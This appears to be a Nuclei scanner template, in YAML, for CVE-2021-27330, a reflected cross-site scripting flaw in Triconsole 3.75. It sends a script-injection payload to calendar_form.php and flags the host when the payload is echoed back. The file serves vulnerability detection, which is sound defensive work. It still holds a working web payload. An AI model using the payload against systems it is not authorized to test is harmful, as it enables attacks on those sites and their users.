26 lines
544 B
YAML
26 lines
544 B
YAML
|
id: CVE-2021-27330
|
||
|
|
||
|
info:
|
||
|
name: Triconsole 3.75 XSS
|
||
|
author: pikpikcu
|
||
|
severity: medium
|
||
|
reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-27330
|
||
|
tags: cve,cve2021,triconsole,xss
|
||
|
|
||
|
requests:
|
||
|
- method: GET
|
||
|
path:
|
||
|
- '{{BaseURL}}/calendar_form.php/"><script>alert(document.domain)</script>'
|
||
|
matchers-condition: and
|
||
|
matchers:
|
||
|
|
||
|
- type: word
|
||
|
words:
|
||
|
- "<script>alert(document.domain)</script>"
|
||
|
part: body
|
||
|
condition: and
|
||
|
|
||
|
- type: status
|
||
|
status:
|
||
|
- 200
|